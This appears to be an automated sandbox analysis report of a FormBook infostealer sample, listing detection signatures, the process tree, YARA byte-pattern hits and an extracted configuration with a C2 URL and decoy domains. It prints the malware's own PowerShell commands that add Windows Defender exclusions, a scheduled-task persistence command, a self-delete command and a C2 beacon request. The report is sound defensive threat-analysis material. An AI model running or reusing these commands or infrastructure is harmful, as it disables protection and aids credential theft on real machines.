Play interactive tour

Edit tour

Analysis Report Ms5nQdSz5l.exe

Overview

General Information

Sample Name:	Ms5nQdSz5l.exe
Analysis ID:	404105
MD5:	ba01df16e4c876e078348fd4479a8fdf
SHA1:	6c7f20976d3e7d9bf9f8a410cbc54962d1ef52bb
SHA256:	8353e30c6566795da3e5aa38a22b4707ee895cfa115ffa399cfbe7d57d00f91d
Tags:	AgentTeslaexe
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

.NET source code references suspicious native API functions

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses schtasks.exe or at.exe to add and modify task schedules

Antivirus or Machine Learning detection for unpacked file

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Non Interactive PowerShell

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

Ms5nQdSz5l.exe (PID: 3560 cmdline: 'C:\Users\user\Desktop\Ms5nQdSz5l.exe' MD5: BA01DF16E4C876E078348FD4479A8FDF)

powershell.exe (PID: 6188 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Ms5nQdSz5l.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 6208 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 6260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 6268 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zFVxYeAVOjnwuB' /XML 'C:\Users\user\AppData\Local\Temp\tmp7635.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 6316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 6424 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 6444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Ms5nQdSz5l.exe (PID: 6452 cmdline: C:\Users\user\Desktop\Ms5nQdSz5l.exe MD5: BA01DF16E4C876E078348FD4479A8FDF)

explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

mstsc.exe (PID: 2196 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)

cmd.exe (PID: 6848 cmdline: /c del 'C:\Users\user\Desktop\Ms5nQdSz5l.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.kelurahanpatikidul.xyz/op9s/"], "decoy": ["playsystems-j.one", "exchange.digital", "usaleadsretrieval.com", "mervegulistanaydin.com", "heavythreadclothing.com", "attorneyperu.com", "lamuerteesdulce.com", "catxirulo.com", "willowrunconnemaras.com", "laospecial.com", "anchotrading.com", "mycreditebook.com", "jiujiu.plus", "juniperconsulting.site", "millionairsmindset.com", "coronaviruscuredrugs.com", "services-office.com", "escanaim.com", "20svip.com", "pistonpounder.com", "lasecrete.com", "sabaimeds.com", "madinatalmandi.com", "jumlasx.xyz", "smartspeicher.net", "punkyprincess.com", "herren-pharma.com", "belfastoutboard.com", "safifinancial.info", "xn--15q04wjma805a84qsls.net", "washingtonrealestatefinder.com", "jewishdiaspora.com", "aerinfranklin.com", "taylorglennconsulting.com", "fartoogood.com", "samjinblock.com", "minianimedoll.com", "saporilog.com", "littlebirdwire.com", "xn--farmasi-kayt-c5b.com", "purifiedgroup.com", "purifymd.com", "renewedspacesofva.com", "pilardasaude.com", "varietycomplex.com", "leadsprovider.info", "streamxvid.com", "manuelbriand.com", "hellosunshinecrafts.com", "hellodecimal.com", "4980057280880200.xyz", "dynmit021.digital", "hotdogvlog.com", "fairyrugs.com", "ievapocyte.com", "prospecsports.com", "proteknical.com", "36rn.com", "mongdols.com", "rentportals.com", "drcpzc.com", "h59h.com", "sonjowasi.com", "nalanmeat.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x101208:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x101482:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x12da28:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x12dca2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x10cfa5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1397c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x10ca91:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1392b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x10d0a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1398c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x10d21f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x139a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x101e9a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12e6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x10bd0c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x13852c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x102b93:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x12f3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x112e17:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x13f637:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x113e1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x10fd39:$sqlite3step: 68 34 1C 7B E1 0x10fe4c:$sqlite3step: 68 34 1C 7B E1 0x13c559:$sqlite3step: 68 34 1C 7B E1 0x13c66c:$sqlite3step: 68 34 1C 7B E1 0x10fd68:$sqlite3text: 68 38 2A 90 C5 0x10fe8d:$sqlite3text: 68 38 2A 90 C5 0x13c588:$sqlite3text: 68 38 2A 90 C5 0x13c6ad:$sqlite3text: 68 38 2A 90 C5 0x10fd7b:$sqlite3blob: 68 53 D8 7F 8C 0x10fea3:$sqlite3blob: 68 53 D8 7F 8C 0x13c59b:$sqlite3blob: 68 53 D8 7F 8C 0x13c6c3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Ms5nQdSz5l.exe PID: 3560	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.Ms5nQdSz5l.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
9.2.Ms5nQdSz5l.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.2.Ms5nQdSz5l.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17619:$sqlite3step: 68 34 1C 7B E1 0x1772c:$sqlite3step: 68 34 1C 7B E1 0x17648:$sqlite3text: 68 38 2A 90 C5 0x1776d:$sqlite3text: 68 38 2A 90 C5 0x1765b:$sqlite3blob: 68 53 D8 7F 8C 0x17783:$sqlite3blob: 68 53 D8 7F 8C
9.2.Ms5nQdSz5l.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
9.2.Ms5nQdSz5l.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.2.Ms5nQdSz5l.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

System Summary:

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Ms5nQdSz5l.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Ms5nQdSz5l.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\Ms5nQdSz5l.exe' , ParentImage: C:\Users\user\Desktop\Ms5nQdSz5l.exe, ParentProcessId: 3560, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Ms5nQdSz5l.exe', ProcessId: 6188

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.kelurahanpatikidul.xyz/op9s/"], "decoy": ["playsystems-j.one", "exchange.digital", "usaleadsretrieval.com", "mervegulistanaydin.com", "heavythreadclothing.com", "attorneyperu.com", "lamuerteesdulce.com", "catxirulo.com", "willowrunconnemaras.com", "laospecial.com", "anchotrading.com", "mycreditebook.com", "jiujiu.plus", "juniperconsulting.site", "millionairsmindset.com", "coronaviruscuredrugs.com", "services-office.com", "escanaim.com", "20svip.com", "pistonpounder.com", "lasecrete.com", "sabaimeds.com", "madinatalmandi.com", "jumlasx.xyz", "smartspeicher.net", "punkyprincess.com", "herren-pharma.com", "belfastoutboard.com", "safifinancial.info", "xn--15q04wjma805a84qsls.net", "washingtonrealestatefinder.com", "jewishdiaspora.com", "aerinfranklin.com", "taylorglennconsulting.com", "fartoogood.com", "samjinblock.com", "minianimedoll.com", "saporilog.com", "littlebirdwire.com", "xn--farmasi-kayt-c5b.com", "purifiedgroup.com", "purifymd.com", "renewedspacesofva.com", "pilardasaude.com", "varietycomplex.com", "leadsprovider.info", "streamxvid.com", "manuelbriand.com", "hellosunshinecrafts.com", "hellodecimal.com", "4980057280880200.xyz", "dynmit021.digital", "hotdogvlog.com", "fairyrugs.com", "ievapocyte.com", "prospecsports.com", "proteknical.com", "36rn.com", "mongdols.com", "rentportals.com", "drcpzc.com", "h59h.com", "sonjowasi.com", "nalanmeat.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: Ms5nQdSz5l.exe

Virustotal: Detection: 26%

Perma Link

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 9.2.Ms5nQdSz5l.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Ms5nQdSz5l.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: Ms5nQdSz5l.exe

Joe Sandbox ML: detected

Source: 9.2.Ms5nQdSz5l.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: Ms5nQdSz5l.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: Ms5nQdSz5l.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000000B.00000000.350623298.000000000F5A0000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: Ms5nQdSz5l.exe, 00000009.00000003.243388587.0000000000F30000.00000004.00000001.sdmp, mstsc.exe, 00000017.00000002.506619622.0000000004F60000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Ms5nQdSz5l.exe, mstsc.exe
Source:	Binary string: mstsc.pdbGCTL source: Ms5nQdSz5l.exe, 00000009.00000002.389539524.0000000002FA0000.00000040.00000001.sdmp
Source:	Binary string: mstsc.pdb source: Ms5nQdSz5l.exe, 00000009.00000002.389539524.0000000002FA0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 0000000B.00000000.350623298.000000000F5A0000.00000002.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.kelurahanpatikidul.xyz/op9s/

Performs DNS queries to domains with low reputation

Show sources

Source:

DNS query: www.4980057280880200.xyz

Source: global traffic

HTTP traffic detected: GET /op9s/?kxl0=3OIkoiHCzE1hCgamnAGWyNY23l3GjmrmFj0eumUXTWZXUNP+r8qibU1KsAhTf4lNnle5&kPm0g=K8kX HTTP/1.1Host: www.safifinancial.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic

Source: unknown

DNS traffic detected: queries for: www.safifinancial.info

Source: powershell.exe, 00000007.00000003.422711035.0000000008CEA000.00000004.00000001.sdmp	String found in binary or memory: http://crl.microsoft.
Source: powershell.exe, 00000007.00000003.422711035.0000000008CEA000.00000004.00000001.sdmp	String found in binary or memory: http://crl.microszt
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: powershell.exe, 00000001.00000003.340504471.000000000095B000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Ms5nQdSz5l.exe, 00000000.00000002.244358631.00000000030A1000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.439791337.00000000048F1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Ms5nQdSz5l.exe, Ms5nQdSz5l.exe, 00000009.00000000.239718276.0000000000622000.00000002.00020000.sdmp, mstsc.exe, 00000017.00000002.504404849.0000000004C22000.00000004.00000001.sdmp	String found in binary or memory: http://vbcity.com/forums/t/51894.aspx
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000001.00000003.340504471.000000000095B000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
